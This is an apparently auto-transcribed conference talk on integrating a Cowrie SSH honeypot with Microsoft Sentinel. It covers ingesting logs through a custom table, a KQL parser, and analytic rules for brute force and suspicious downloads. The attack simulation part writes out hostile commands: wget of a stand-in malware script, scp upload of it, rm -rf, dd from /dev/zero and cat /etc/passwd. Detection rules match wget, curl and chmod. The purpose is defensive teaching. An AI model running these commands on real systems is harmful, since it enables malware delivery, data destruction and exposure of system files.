Hi all, in this festive tech calendar 2024, I'm your host for the slot, Vipul Dabi. I'm going to be presenting on Cowrie Honeypot integration with Microsoft Sentinel. But first thing first, we'll just go through this festive tech calendar website. So let me just take you to that. So here's the website, festive tech calendar 2024, and if I just see the calendar, right? My particular session is scheduled for today, 30th of December 1990, and this is the slot available. Cowrie Honeypot integration with Microsoft Sentinel, and where I'm going to guide how you can integrate Cowrie Honeypot with Microsoft Sentinel, which is a SIEM and source solution from Microsoft, right? We'll understand why this integration is important and how you can leverage and build use cases on top of it once you integrate your Honeypot with Sentinel, right? So that is a brief on the topic. Let's check the speaker profile. If you happen to visit this portal, you can go to speakers and just search my name like this, and you will see here that I am working as a security consultant with Microsoft, and a short bio and the LinkedIn profile which you can navigate to view through my profile and possibly send me a request or seek any questions around the topic post the session happen, right? Now the second important most important thing is this cause. The cause is very important. Yes, we our festive tech calendar is going to support the beats and cancer charity, right? This is very important because every contribution brings us closer to brighter healthier tomorrow, so hence this makes it very important. Not just the technical sessions which are lined up there, but the cause is also very important, which is driving all this initiative, right? So just ensure or make sure that you go through this portal and contribute as much in your capacity, right? And that's how you can support this cause which we have in hand, right? So with that, let's proceed with our content, which is this Cowrie Honeypot and its Microsoft Central integration. So what is Cowrie? That is the very first thing which we need to understand, right? There are lots of honeypots are available in the market, but we are focusing on Cowrie. So why? Cowrie is an SSH and Telnet honeypot designed to simulate a vulnerable environment, capturing attackers' interactions, including commands, the file transfers, and the behavior. So basically, in our own environment, we are creating a trap which will be accessible by the adversary, and he will perform his acts right on our environment, and then we can, by decepting them or by asserting those attack measures which the adversary takes, we'll try to protect our system eventually, right? So that's a deceptive technique. Now it helps organization understand attacker tactics and techniques, the one which we are trying from MITRE ATT&CK framework, without risking the actual real system. We are not getting a real system at the stake, but we are creating a dummy instance like that, which is a honeypot, so that attacker can come and try his all attack measures so as to be, and then we as a proactive team will look for those attack measures and protect our actual system, right? So that is the core construct of the honeypot, right? Now, why we need to integrate with Microsoft Sentinel? I mean, we have multiple SIM solutions available in the market. Why only Microsoft Sentinel? Yes, so that is very important. Microsoft Sentinel is a SIM source solution from Microsoft, and it is easy to do set up as compared to any other SIM solutions available in the market. You can easily connect all the data sources, and for very first reason, Cowrie, we don't have any data connector out of, so it's purely a custom solution which I'm bringing for you. So we'll understand how you can connect a custom log source with Microsoft Central, for which we don't have anything available out of the box, and that's why this is important. You'll create everything from scratch, right? So first thing first, we'll get centralized monitoring, ingesting Cowrie logs to Sentinel for unified threat visibility. We can correlate honeypot data with sources like firewall endpoints to find any traces around, right? We can do advanced threat detections, identify novel attack patterns, enrich threat intelligence with IP domains and file reputation data. We can do incident response on it. We can perform threat hunting, which is a proactive approach again. We can look to enhance security posture with this particular integration in place. So these are some of the key benefits which are there. Now, what are the core benefits which we have? Deception as defense. This is very important. Honeypots lure attackers into control environment, revealing tactics. So, what is our intention? That we want the adversary to attack the system, and then we want to capture their pattern. And for capturing their pattern, we have SIM solution in place, which will listen to the logs which Cowrie Honeypot will generate. So, Cowrie will create an environment for the attackers or adversary to to attack into our control environment. Why I'm saying it's control? Because we are monitoring it, right? We are monitoring it from the perspective of attackers attack to the environment. So that is why it is important. Now, operational efficiency, automation reduces manual effort and improves response time, right? And improved insight, centralized analysis provides actionable intelligence for SOC teams. So we'll get centralized analysis from SIEM Sentinel, right? With that, I'll just present you the high level architecture diagram so that you will get yourself acquainted how the flow works and where the things are situated when I'm actually into my environment, right? So just to start with, everything in Azure or Microsoft Sentinel or Microsoft or in Azure Cloud is a part of a subscription or a management group. So there is a management group as a very top hierarchy, then we have subscription inside to it, and eventually we have resource group inside to it. The resource group, as the name indicate, will club all the possible resources which we have. For example, we have a VM here, we have a different VM which is private IP, we have public IP VM, then we have Sentinel also, we have log analytics workspace also. Just to brief on, Microsoft Sentinel is a SIEM solution that is totally dependent on a log analytics workspace. When I say log analytics workspace, it is like a storage where all the logs will get stored, but it's a storage account which you need to use efficiently, and you need Sentinel to be onboarded on top of this log analytics workspace storage, right? And here all the tables where we'll ingest the logs all will be created here, and we use this particular workspace to to query our logs which we are going to ingest from the Cowrie Honeypot. So this is about the Sentinel part. Sentinel is the same solution that gets onboarded onto the log analytics workspace. Post to that, we have VMs. We have basically two VMs. One is public IP. One is with public IP. Both of them are Debian Linux variant. But this one is having private IP when you are planning to host it in a control environment which is not going beyond internet or not going towards internet. So then we have a private IP so that it remains inside, and if adversary able to penetrate, will capture that internal adversarial attacks, right? Or tactics or might anything of that sort, right? Malicious intents we can, if you want to capture. Now for the public IP one, we can use command prompt, right, to perform SSH and Telnet. This SSH and Telnet is supported natively by Cowrie Honeypot, so we can put command, we can execute commands so towards this public IP. So consider this as a machine which got compromised by an attacker and he is able to access it. As he was able to access it, he is able to perform malicious commands like trying to authenticate to the machine, trying brute force there, perform executing commands like who am I, you name, simulating malicious activities like wgetting malicious site.com, malware, downloading malware, right, curl to that malware, uploading malicious files, testing nmap, etc., which will eventually be converted in log format. And as we have installed an agent which is referred to as Azure Monitor Agent, this will be streaming logs to this workspace on which Sentinel is onboarded. Once Sentinel is there in place, then we can create analytical rules, workbook to visualize the data, automation rules and playbooks to respond or have SOAR capabilities in place, right? So this is the place for logs to get stored, and then we have other things which we can leverage out of the box to play around the logs which we have clubbed together in our workspace, right? So in general, this is a high level architecture diagram of integration between Cowrie logs and Microsoft Central, depicting public and private virtual machine, command executions from external platform, data collection rules, AMAs. AMA, I just explained you what is AMA. Is Azure Monitor Agent, basically, which we need to set up on our machine so that it can send telemetry to the Sentinel workspace, correct? And DCI stands for data collection rule. We'll explain it in depth. This helps us to define the source and the destination. When I say source, what is the source of log generation or log ingestion? So in our case, logs is generated whenever an activity is performed at the command prompt, and it will get stored in this particular virtual machine from where we are getting it. So this becomes the source, and the destination is the workspace from where workspace, to be very precise, the table actually where we want to ingest the logs. So that everything from source to destination to a particular table in a workspace is being governed by the data collection rule. Then we have Central, which is a SIEM solution. Then log analytics workspace, which is the storage, as I told you, on which the Central is onboarded to, right? So I hope this gives you a high level overview of the what we are going to achieve through this whole integration in place. So let's proceed further. So I'll just walk you through my virtual machine which I have in place. So this is my Azure portal. I'll just take you immediately to my virtual machines. And this is my machine which is in running state as of now. If you see, it is already started and running with this particular IP address 4090.194.30, right? So this is the one which I've taken as a screenshot here. Now, very first prerequisite, right? As soon as you come to here, you might opt any other approach to connect to it. I prefer Bastion, so I have Bastion in place, which will give me access on the portal itself. You need to put your VM username and password. Just prior to that, just go to your connect interface. Check access to port 22 because this is the required port for you to perform SSH to the machine. As you start checking, it will say it will check access. Basically, if the it will check whether the network security group of this machine is having port 22 enabled or not. If there is not, it will say not accessible. As of now, it is accessible. If it is not for you, then you can request an access for your own IP or the configured IP you have, right? As soon as you do that, you can go and check the network settings where you have network setting for the subnet as well as for the network interface card, which is at the VM level itself, right? Here you see I have 22 enabled. So as I've enabled it for just in time, just in time is for specific hours only it will be available. Just in time, we are principle of least privilege or least access we are actually following here. So NSG is very important. Now apart from that particular port, we have one more port which goes with this name, 2222 or 2222. This is required by Cowrie. So if I need to make access to Cowrie Honeypot or put any SSH command towards it, even if I want to log into that, I need to have this port enabled. So I've enabled it at both subnet as well as network interface card level. So with that, that is fine from the brief perspective. Now as you log in, you will be coming to this login machine. This is your Cowrie Honeypot. If I just check the directory structure, we have this directory and this is the Cowrie environment. And this is my installed Cowrie instance, right, which is a Debian machine. So with that, let's get back to our slide deck again. So we have guided the prerequisite perspective is port 22 and 2222 we need to enable. Okay, now installation steps. This is very important. There are a couple of installation steps which you might need to follow. Total 7 steps which once you follow, you will be able to set up Honeypot, Cowrie Honeypot in the machine. So for my instance, it's a Debian machine. Okay, so this is installing Cowrie in 7 steps. Install the system dependencies. There are certain dependencies which you need to work with. Create a user account, check out the code, set up the virtual environment, install the configuration file. Starting Cowrie is important. Listening on port 22 and other ports which are required. Running under supervised. Configure additional output plugins, troubleshooting, updating and modifying Cowrie. So these are the steps which you can follow. I've already attached them in the slide deck for you to refer, because otherwise there would be a complete session on installation of Cowrie itself. So that I'm skipping because it's straightforward, and from the documentation of the Cowrie read the docs, you can straight away follow that. Now the very important aspect is the folder structure which we have in the Cowrie, right? So this is very important. You need to have an understanding the different folders which you see around in the Cowrie honeypot, right? So with that, let's come to our Cowrie honeypot here. We'll just go to cd Cowrie and I'll just give you a quick walkthrough of the folder structures which we have in place, right? So this is important. So as soon as you reach to this Cowrie and you do ls to list the folders, you will see a couple of folders here. So the prominent ones, if I just give you a quick walkthrough, and as per the slide, as userdb.example, this is very important file, right? So it's located in the etc folder. So cds etc. As you give ls, you will see that userdb.text. So just do a cat on this userdb.text and you will see a file with some usernames and password. Okay, so this is the username one and username password, right? Root will go with root will not go with this not sign indicates that it will not work. Not work means like 1 2 3 4 5 6 with not mark will not work. And if you have honeypot with root, it will not work. It will not allow you to log in. Root with anything else will work. Tomcat with anything else will work. Oracle with any other password will work. Any other username with and some password will work, and any other username with any other password will work. So these are the permutations and combinations which are supported for you to authenticate to Cori, right? So this is very important. So this is the key file. You can define your own so that being followed by other one, or anything you can follow. This is by default coming, and I have added only this, which is mine, right? So this is useful for authentication purpose, right? So I'm just guiding you through this so that if you happen to lose your password or if you're not recollecting anything, you can come to this file and go through and perform authentication to this. Now, when I say authentication, when I say authentication, how you can authenticate is just need to use this command SSH hyphen p. Remember the port which we used or whitelisted in our NSG is 2222, and we are trying to log in as root, and we need to provide what? We need to provide the IP address of our machine. So the IP address of our machine is, just go to overview, just copy this out like this. Now the very first thing, it is looking for password, right? So I am giving root, with root which will not go. So 1 2 3 4 5 6, I'll just give that. So it says permission denied because it's already highlighted that not root, will root username will not go with. So if I just give honeypot, it's also not taking. Now if I give root, so it should take that. So it is taking that. It's allowed me to log in. So I'm able to authenticate to the Cori machine, right? Now I'm acting as now I have the opportunity to act as an adversary and perform certain commands and exhibit some attack mechanisms or tactics, right? Which I can trace it back to eventually protect my system, right? So yeah, let's get back to this slide deck again. So with that, we have understood the UserDB example, which has all the username and passwords, which will support the authentication to Cori. Now with the next folder is this var folder. So just do cd dot dot ls. If you do cd var, if I just give ls command here, cd log, here you see cd again, just do Cori ls. Here you are seeing your files, correct? So the most important file which we are going to refer, I mean, all the logs which Cori generates get stored in this place only, right? This is the path. If I just give you pwd here, present working directory, home, Cori var, log Cori. This is the actual path which is of importance for us. And as you see, there are two distinct formats which Cori support. First, this is JSON format. Other is the log format, right? So these are the two formats. So both, if you can tail, it would be good for you to understand. So if I just give tail command here, tail Cori.json, this will show you the logs in the JSON format. So if you see event ID, every event, the whole playground of Cori is dependent on the event ID. So session get closed, session get connected, we get to know the client version, the key exchange happens, right? So these are all the event ID we have, right? Then we have the source IP, from where the source the request came, the port actually used, the destination IP, the destination port. If you see, the private IP of this machine is 10.0.0.4, and that is highlighted as a destination IP, right? The private IP of this machine. So this is the destination. Then the session ID, the protocol used, etc. All the details, the message, new connection is established, right? So that you are getting. Now similarly, if you want to see the format in the log format, you can check the log format. So this is how the log format looks like, right? Login attempt happened, initialize emulated service architecture, root authenticated with password, starting service SSH connection, got channel B session, channel open, right? Now if I just give a clear here, if I want to listen to the traffic in real time, what I can do is I can put like tail hyphen f Cori.json. So now it is listening in real time. When I say real time, just get to your command prompt again. I'm already logged out, right? So as I try to log in again, you will see some logs populating here. So Just keep an eye there. Yeah, it is populating. Now it is seeking the password for the root user. I'll give some 1 2 3 4 5 6. So you see, event ID Cowrie login failed. The event got generated is login failed even because I am not able to, I didn't give the right password as per my user DB example, so it is getting failed. Password 1 2 3 4 5 6, the password which I use, so that also it is giving. Now again I'll try to attempt to log in again. So it allowed me to log in, right? So login success happened. The password uses root again along with the username, and I'm able to log in, and my session got set. So session parameters and client says it is trying to get all that details, right? Now I can try uname -a, which will give me the details of my machine. So command input, I gave one command. If I just do pwd, if I use make directory, pull, I will do ls to see the directory. If I do rm-rf, so it is, so command input, okay, cmd rm-rf. So this is the command, so it will give me that clarity. So understood, from the adversary perspective who's trying to perform all the type of attack mechanisms, I'm tracking them here and I'm sending it to my center and performing analysis on top of that. So that is the core crux behind, right? With that, let's get to our slide deck again. So we just understood the tail command to check the Cowrie logs. We have two formats, Cowrie JSON and Cowrie log, and we can do tail -f to listen in real time, right, for Cowrie log as well as Cowrie.json. We prefer JSON format because it's key value pair and it's easy to work with, right? When we ingest this logs in Sentinel, it's not ready for us to build on top use cases on top of what we ingest. We need to do some parsing, and for parsing, JSON is the right format which is in support, right? So that is important. Now this is again a very important slide deck. Here I'm going to guide you about the various states which we have on the Cowrie, right? We have start, stop, status, restart. So we'll go through one by one all of them and how we can start it, right? So this is important. So if this is again a part of the folder structure only, so I'll just come out of my uh, real-time listening in Cowrie. Let's come back one step again. So cd Cowrie, cd Cowrie. Now we'll go to our bin directory. Bin directory is the place where we have the Cowrie, which is not a file for you to just to say, but in this bin folder, if you just come one step back, ls, and if you give like bin slash Cowrie status, so it says that Cowrie is running. So it is giving me the status of man. The process ID is 2432. And for me to work with Cowrie, it is important that it is running. First thing, if it is not running, as I get to see that the status of Cowrie is not running. So if I just put a stop, so then it will stop. Okay, it says okay, stopping Cowrie. So if you now just see status, yes, just get to see the status. It is still running. Oh, it should not. It should not ideally. But I see that it says there's some process which is removing issues, right? If it is not running set, then you can put this command. Okay, I think it's not support permitting my operations because of the sudo rights which I don't have as of now on this machine. So possibly that will be the cause. But as of now, the key status or key requirement for us to work is this, that it should be in a running state, which is the fact. And if you want to see any other state or if you want to restart, you can use all these options. The only thing, the directory structure is under bin and the Cowrie. So slash bin slash Cowrie status restart stop, and these are the four options which you can perform across. This is important, right? So I've captured everything. Yeah, Cowrie is running, stopping Cowrie, like that. So now the very important aspect is how to SSH. I have already guided you that. So if you want to SSH, the key requirement is that you need to provide your VM where this port is enabled and the username, and all the username and authentic password and authentic username you'll get into the userdb.example file or text file. If you don't give the right password, it will fail. It will not allow you to authenticate. If you give the right password, it will authenticate to you immediately. So that is the SSH part. Now, if there are more number of failures, that becomes a brute force attack, right? If there's a right login, they will get the required event. Based on event, we frame our analytic rules, etc. So let's proceed further. So till now, I have given you a quick walkthrough how Cowrie works, how we install that. Once it is installed, how we play around with the different folder structures we have, how logs get generated, where they get stored, what are the formats, log.json, etc. How you can keep a real-time track on the logs using tail-f command. Then how you actually interact with Cowrie, the SSH command, and what other things you can do to interact with Cowrie. What do you need to enable from the network security group perspective of the virtual machine where it is installed, right? So these are the important. Now, that is one aspect of the whole picture. The second aspect of this is the Microsoft Sentinel integration. So for that, we need to have some understanding of Microsoft Sentinel, right? So Microsoft Sentinel, as I already indicated, that it's a SIEM source solution which we have, correct? And for me, or for us to integrate Cowrie Honeypot with Microsoft Sentinel, we need certain constructs in place, like data collection endpoint, data collection rules, right? Data collection endpoint. Whenever there's a custom log source, we need data collection endpoint. This is one of the important terminologies. So data collection rule, as I've already defined, that you need to attach the source to destination, right? So for that, you need the data collection rule. You need to have your own custom table in place, right? Because it's a custom solution. There is no table available out of the box. Table is something you can consider where all logs will get stored. Each of the log source has its own corresponding table. Now that goes true only when it is available out of the box from Sentinel. But this solution, as we know, is not available out of the box from Sentinel. So hence we need to go with a custom table here. As of yet, it's not there, but probably in the future there would be something coming up. The Cowrie integration supported. So then we have all the constructs inbuilt to the solution. We need to have a log analytics workspace because that's the actual log storage area, right? And on top of which only Sentinel will be onboarded. So once Sentinel is there, then we can start building our use cases. So these are few of the important constructs which we need to keep in mind, right? With that, I'll just take you to the portal again. So I'll just take you to Sentinel, and we have this Cowrie honeypot. Okay, now you see you have this workspace. This is my workspace. So I'll just search log analytics, uh, log analytics workspace here. This is my actual workspace, and if I just quickly give you a walkthrough of it, um, the usage details, right? Here the pricing tier I'm using is pay as you go. Data retention is for how much time I need to keep my data retained here. So the maximum supported is around 2 years. The minimum is 30 days. Okay, and I don't have any daily cap. Daily cap is something like if you want to control the ingestion per day, like not beyond 1 GB or 2 GB based on your uh, log ingestion, you can set that. Basically, a cost saving mechanism here. Now this is the workspace which I've created and I've onboarded my Sentinel on top of it. So that's why it becomes a mandatory thing, right? It's because Sentinel exists on top of workspace only. So that's why it is saying selected workspace like this, right? Now, this is my Sentinel instance where I can check my log sources, right? I can check the data connectors which I have connected, right? To install any data connector, we need to have a awareness on this content hub because most of the solution we install from content hub only. So that's why it is important. With that, let me take you back to my slide deck again. So how we create a custom logs, right? Basically, we need to navigate to our log analytics workspace. As you go to a log analytics workspace, you will go and see tables here, and you can create a data collection rule based table. Okay, why I'm going to data collection rule based table? Because MMA is getting deprecated. it is not supporting AMA. AMA stands for Azure Monitor Agent. MMA is the older version of AMA, right? The first version is the age. Basically, they are setting up the agent onto the machine, and hence MMA and AMA. AMA is the latest one, and AMA works with DCR, so we are leveraging DCR. Very first thing you need to provide the table name, the custom table name, possibly if you, as we have custom solutions as Cowrie, so something in line with the Cowrie solution, right? You can provide the description. You can create a data collection rule if you have any. If not, then you can create it from here as well. You can provide the name and that name will reflect here. Basically, DCR is something where we need to define the source and the destination. We'll quickly give a quick walkthrough here. DC comes into context whenever you have a custom log source, right? So we need DC in place. Without that, it will not work. Now, until you provide this data, it will not proceed further, I believe. So just give some random data here. Schema and transformation is very important. Here you need to provide the schema. How will you get the schema? So as we just saw right previously, we have the JSON schema here. You can get some abstract out of that. This one, right? This is a JSON schema. You can take that abstract as you do tail command. So you can take that abstract and possibly try to upload it here. For example, if I just try it now, for example, these two only. Okay, just copy that, open your notepad, save it. So save it like that and just get to here, browse your files. Okay, it says could not be uploaded, please try again. No issues, we'll just try to see what is the issue. Use like this, use like this. Now try to upload it. Try to perform some JSON lint on top of it to verify the format. So it says it is not valid here. So this JSON formatting is very important, otherwise it will not upload and it will not be able you will not be able to create a custom table out of that, right? Hmm. Let's just try to see if it, yeah, it's a valid JSON now. So now you can use it in your place and just save it. Okay, now just try to upload that, browse for your JSON file. So it is taking that now. It is segregating each column, but it is also giving us an issue that time generated field is not found. So you can use a transform editor here. By default, whatever table it is coming, it will by default take it as a source. So you just need to perform. So what it's saying in general is that it is not able to identify time generated field, which is a mandatory field for creating any table in your uh, workspace, right? So what you will do is you will just extend it. You will create a time generated field, right? Because it is not able to find that, so just create that as a field name equals to, you need to take the field which is mostly in, huh, if you see the one which is goal is timestamp, right? So just take that timestamp, then we just try to run it. So you see time generated here along with timestamp, right? So there are two same columns, but I will project away the timestamp here. Timestamp. Just run that and you won't see timestamp. So we'll apply to it. As I apply, that error goes away. So I've given the schema and the transformation and I'm just reviewing that. Correct? And once you create that, you'll get to see the, so that's how you can create it. So that is the core agenda. Let me get back to my slide deck again. That's what I'm guiding through this slide deck, how you can create a custom table and how you can do the transformation. You get to see the time generated field, how you can remove that, and how finally once you create, you will get to see the schema in this place like that. Right now, as we have the table in place, I'll just give you a quick walk through the data connector which I have used to integrate this thing, right? So just get to your Sentinel again. I'll give you a quick walkthrough. I have um, the data connector which I have used that goes with name custom AMA, custom logs over AMA. So many application logs information in text or JSON format, right? Instead of standard logging services. So as we see, Cowrie has JSON format. So you can pretty much use this particular data connector here. Data connector is something which will help you to ingest logs from different sources. So once you come up here, you will see that I already have a DCR in place. But for you, if you are trying to implement, you need to create a data collection rule where you will specify the name, the resource group, the actual resource. The resource for us is the VM because we are getting logs in this VM from the Cowrie. So you need to get to that particular VM source and then select the actual machine, right? As you select it, you can proceed with next. And here you need to provide the table name. Now this could be the same table which you have created, or you can just give the table name here, okay? Name of the table that matches the device selected from the list above or the new table that you want. So you can create something which is already existing, or you can create a new table from here. It's like FEDV, you can put like that underscore CL like this. Now file pattern, list of comma separated file patterns in the form of, so actual path. If you recollect, if I just do ls here, cd where, so this is my actual path. So I might need to use like this, okay? Probably if you want to be exact, slash Cowrie dot json. So this is my actual path because then only I'll be able to see or do cat here, right? So this is my actual path where my logs are coming. So you need to capture this path for your use case here. File pattern, okay, sorry. This is a table name actually which you would need to put. This is the file. Here you need to provide the table and the source transformation as I just told you, right? How you can do the transformation. If you want to remove timestamp, etc., then you can use that way. Okay, but if you create a new table, that will have its own I mean from here, if you give the table name, then it will create a custom table. I mean table which will have time generated in its own. But if you have it previously created, then there it should be time generated. If not, then you need to transform here like that. Then review and create. Finally, you will see the things here. Basic, you need to provide the real name, right, like this. So I'll just give you what I have created in place for this particular Cowrie integration. I've already given Cowrie LFTSC DCR as a name. Okay. I've chosen my resource as the Cowrie Debian VM. If I just expand that, I see Cowrie Debian VM, right? Just see collect. Under collect, I'm giving the table name Cowrie Airlift CL is my table name. We'll just quickly see what is the schema of that particular table, and it's a table which I have created from this interface, not previously created. Now file pattern Cowrie.json, because I just guided you how you can get the present directory, and review and create finally to see. But the core thing is this. This is the table, right? So with that, let's get to our portal here. Let me just open my Sentinel and check the logs here. Hmm. So we have the table name as this. So I'll just see the logs for last 24 hours, right? Just give it a run. So this is the table, but prior to that, we should see our schema, get schema to, because this is a table which I've created from DCRP, so it has already taken DM generated in it. We have raw data, which where most of the time we'll get the actual data, right? So this is the place where we'll get all the data. Now just give it, let's try to run it and we'll see what are the logs we have. So these are the logs for last 24 hours, right? If I just expand one, you see time generated tenant ID, type correlate, this is a table name. This is a resource ID giving the subscription details. Now event ID, we have Cowrie session closed. This is the event got generated. Then Cowrie Debian VM. Similarly, we have other like this again get closed, right? So if I just put, no, I can't put like that basically. So yeah, key exchange happened. Okay. Hmm. So these are all the logs which we are getting the way we are ingesting it. But if you have observed one thing, that it is in raw format, right? So to perform any analytics on top of it is will be difficult. Ideally, we should extract all the fields from the raw data so as to play effectively around with the logs we are ingesting, right? So let's try to understand more from the slide perspective, right? So custom parser, we need the very first use case we built is this custom parser. We'll understand how we can extract the important fields out of this ingested data. So Cowrie airlift sale. So I'll just quickly go to our functions so as to show you how this parser is written, right? Cowrie function. This is the function. I'll expand the body, but prior expanding the body, I'll just run it for last 24 hours. Again, it will show you the data in a very segregated form, right? You see event ID, duration, message, sensor used, source IP, session. These are the key fields which we are actually extracting from the raw data in Cowrie LFCL, right? But how this is written? All the content of this raw data is getting extended as separate field as it's a key value pair in Cowrie function table, right? So for any of the anti rules or workbooks I am going to use, I'll leverage this particular table now. But how it is written? So for that, you need to load the function code like this, right? So as soon as you load the function code, you will see the extended stuff which is written. This is called as parsing. So Cowrie airlift underscore CL where is not empty raw data. I'm only checking the place where we have some content in the raw data. If there's no content and it's empty, then it's not worth to actually use that, right? To perform any parsing. So I'm just extending raw data by parsing the raw data which I'm getting from the Cowrie airlift, right? Parse JSON is a function which will help us to extract the data in a raw data as JSON format, right? Now extend event ID. I'm extending the event ID because raw data has event ID. I'm converting it to string also. Similarly, duration I'm rounding it off to three values because it is having small duration, so it is giving 000. So I'm taking it to three decimal places, right? Now message is again important. I'm creating a new column message. I'm extracting the message out of the raw data and converting it to string. Sensor is the actual host. I'm getting the sensor value from the raw data and converting it to string. Timestamp is another important variable. I'm converting it to date time and I'm extracting the timestamp from it and storing it in timestamp for column, new column. Source IP is as it is. I'm just converting it to string. And session again, I'm casting it to toString. Mostly I've casted to toString until it is in timestamp or numerical format, right? And then I'm finally doing the projection of these fields which I've extended, okay, from the raw data. So that's the basic parser. Eventually I've saved it as a function. Save as a function we have, right? The function name you need to provide, just give it a category, etc. And then you will see it in the, so with whatever name you're going to save it, you will get to say that we have now. Eventually I can use Cowrie func everywhere to see the segregated data here, okay, like that. So that is what I'm explaining with this particular slide as well here. Now if you want to see something like distinct, or maybe summarize, count uh, by event IDs, right? For each event ID I would like to get the count for last 24 hours. So log close is 6, session close 6, session connect 8, session client version 7, client key exchange, login success, login failed, 4 times login failed, right? So like that. So we have saved it as a function. The benefit we are going to reap by saving it as a function is that we can reuse it. I'm reusing the same saved function multiple times across different analytic rules of workbooks. Or for that reason, and for that matter, any other use case I'm going to build, I'll use that function only. Instead of using the original table, parsing every field, extracting out of it, and then actually writing my code, that will be a clumsy aspect. But with this, it is cleaner and brighter. It is easy to maintain. If any change I want to make, I'll just go to the function, extend a new field if I identify, create a new extension, and I will use it again. Consistency, it will remain consistent across all because there's only single source of truth. It would be helpful for us to leverage it everywhere. Now, with that, the actual crux of whole of this integration is this attack simulation which we are going to do now. For failed logins, if I just show you again, which I've already shown, that if you try a wrong password which are not part of userdb.txt, then we'll get this failed login. We'll get login success if we try the right password. We have login success as well, Cowrie login success even. Now if you give any uh, command input, like we tried rf, we have tried uname. Some of the example I think given lsla. So if I just try lsla here, first I need to log in. So if I just try ls-la, I'm able to see what is the command, right? If I can do cat also, see cat slash etc slash. So I'm seeing this password file which is having all the users root, daemon, bin. So I can try any of that, right? 2:2 like man root with root daemon. So I'm seeing the password file as well. So this is one of the, so these are the command examples which I'm giving you. File download attempt, if I try to do this wget, let me just try this wget. So I'll just try this wget here, okay? Wget http http maliciousSite.com, maliciousSite.com malware.sh. So it will try to connect and it has downloaded something. If I just see ls here, maybe okay, I've downloaded in XYZ. This is my malware file. If I plan to execute that malware.sh, okay. So this is, if I try to upload now, I have downloaded a malicious file. Now I'll try to upload that SCP. I'm using my SCP command to perform root access at one machine, which is like 192.168.1.10 colon slash temp slash malware dot sh. Basically, I'm trying to upload that file. It is, my connection got closed because there's no, that's dummy machine which I'm trying. But as an adversary, I have the right to do that. That I'm indicating to you, right? So that is one thing. Key exchange, normal key exchange which happens during SSH. We already have few of the process. If you see, we have key exchange. Whenever you are successfully authenticating, key exchange happens and it will allow you to authenticate. Command input, if you do nmap, you just try to log in again, SSH to it, provide your password, then try nmap. I think it will ask you nmap command, which if you don't have, you cannot do nmap. RMRF we just did, right? So if I just go to mkdir malware folder, if you want to create, just give ls. We have, so rm hyphen rm, just removing this malware. So this is deletion. I don't have any. So this is one of the command which you can, or dd if dev equals 0. These are the, now if you terminate your session, you have like exit. You are exiting this. So these are the top 10 attacks which I've simulated in my environment, easy to do, which you can also try. Now as I see go, we have already just tested out like how we can get a count of event ID which have happened in an environment, right, like this in the last 24 hours, or you can expand that possibly. Now let's get to our analytic rules, right? So if you want to see the analytic rules which I have created for this, we can go to our analytics like this. Just get to here. The flow is like you need to ingest the logs first, then you need to parse the logs if it is not parsed, or well to write an analytic rule or any use case you need to parse. So we understood the parsing first. Now as we have parsed the rule, we can frame analytic rules. Why we need analytic rules? Because if you want to detect something suspicious, you need to have analytic rules in place where you define your conditions and logics. Once you have that in place, and if anything that matches that logic, it will generate an incident. So that's a typical SIEM workflow. As it generates the incident, you can analyze that incident, assign it to some person to research more on top of it, take some supportive actions or measures. You can automate response to it. So these are the flow. So with that, we'll try to understand the very first one that goes with detect suspicious file download. So the very first one is detect suspicious file. If I happen to expand this, and I'll just quickly guide through how what does it look for. Detect suspicious file downloads. If there is suspicious file download happening, identify instances where file were downloaded from the known malicious URL, right? So I've given a medium severity. My attack is execution and exploitation for client and user execution, right? Just see the rule logic here. Rule logic is a KQL logic. If we just try to expand it here, Cowrie function is a table where it is looking for file download event, right? And it is extending it, trying to extract the URL out of it and the SHA value of it, and it is projecting the time, even ID, URL, and SHA to it. So this is the, and there is a malicious IDL which we just ran, right? If you recollect. So we have it. So as it is finding the, it is looking for every 5 minutes, right? And I'm actually exporting the URL entities and SHA values, etc. And I'm looking for values greater than 0. So and if the query output is greater than 0, then it should generate an alert, right? That's an incident. It will generate an incident for that automated response. I haven't said any automated response yet. I'm just reviewing creating it. So that's it. So that is one of the analytic rule which I've written. With that, we'll go to our next, which is like more unusual file execution. where I'm looking for wget and curl and chmod type of unusual file executions. So just expand it here, just see the edit function, and we'll see the logic again here, what it's trying to do. I've given MITRE attack framework tactics to it, which is execution again and command and script interpretation. If you see the rule logic here, it is actually looking for the message which contains wget curl change mode. So if you change the file change mode to this scp for file upload, right, if there's any of that trace, it will try to capture the count as well, and it will give me the source ip from where the request is coming. So I'm getting that as well. So this will also get trigger will this will also trigger an incident or generate an incident, because the value greater than threshold 0 is given here, and it will generate an incident like that. So we'll be able to see the incident for that as well. Then Cowrie honeypot brute force detection. This is important. Brute force detection, where we'll see successful login or failed login here. Brute force something when you're trying multiple password and not able to authenticate successfully, right? So here you are seeing the description and the name. Here you have 5 attack measures like credential access. We have brute force here, password guessing, password cracking, password spraying, right, and few more. If you try to explore on the KQL part, you will see the function with event ID login failed. Failed attempts were counting by source IP. If the failed attempt count is greater than 3, if you tries and it doesn't work, then it will be generating an incident, right? We don't have any yet, which is fulfilling this criteria, so we'll not see any uh, incidents, right? But if there's any match with the KQL, or if you think that it is not going in line with our policies, you can always amend this KQL, right? You can set it to threshold to 1 or 2 also, right? Like that. Now let's try to visualize the incidents which we have got based on these analytic rules which we have written. We have this one, uh, brute force detection. Okay, for last 24 hours we see this. For last 30 days, if I just try to refresh login failed attempts to portal, okay, that is different. But Cowrie honeypot brute force we are seeing here, right? Hmm. So we have this incident. We can go to check the incident, view full description out of it. We'll get to see the URL from where, or the host from where this request is coming. We can further do investigation on top of it, how it is coming, what entities are in part of it, right? So the Cowrie honeypot brute force is detected. What are the entities? This is the entity. This is the alert which has caused this incident in place. You can see other insights if any. You can get to see the timeline of it. This is how you can investigate it. This is high severity. It is unassigned, and you can assign it to user who is part of your identity solution. You can change the status, right? Entities. What are the key entities? You can trigger and playbook. Playbook is the response part at an entity level or as well as at the incident level also, right? If you want to trigger any playbook or in automation, you can trigger it at the incident level as well. Okay, here it is guiding about the tactics and techniques as well. Okay, now with as we have understood the analytic rules, how incident generates based on the analytic rules, the second thing and most important is the workbook, which will help you to visualize data, right? That visualization is very important. So it's a custom workbook again. You can go to workbook under threat management in Sentinel. Just click on workbook and view said workbooks here. So here you can edit it to and if you want you can see. So first thing is very common, it will show from where we are getting logs into a Sentinel instance. Now we are counting by source IP. We have different source IP from where request can come right to our honeypot. So we are trying to capture the source IP from where requests are coming to our honeypot. Then what are the key matrices of our Cowrie log? So what total events, total successful login happens. Basically at the back end, it will be looking for the event ID and getting the count. So total 901 events 